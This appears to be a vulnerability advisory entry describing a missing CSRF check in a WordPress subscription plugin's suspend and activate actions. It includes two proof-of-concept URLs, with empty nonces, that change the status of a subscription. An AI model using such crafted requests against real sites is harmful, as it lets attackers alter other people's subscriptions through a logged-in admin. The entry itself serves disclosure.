Description The plugin does not have CSRF check when suspending and activating subscriptions, which could allow attackers to make a logged in admin suspend or activate arbitrary subscription via a CSRF attack
Deactivate subscription with ID 53: https://example.com/wp-admin/edit.php?s=&post;_status=all&post;_type=shop_subscription&_wpnonce=&_wp_http_referer=&action;=on-hold&m;=0&_wcs_product=&_payment_method=&_customer_user=&paged;=1&post;[]=53&action2;=on-hold Activate subscription with ID 53: https://example.com/wp-admin/edit.php?post_type=shop_subscription&marked;_on-hold=1&changed;=1&ids;=53&post;=53&_wpnonce=&action;=active
CPE | Name | Operator | Version |
---|---|---|---|
eq | 4.9.0 |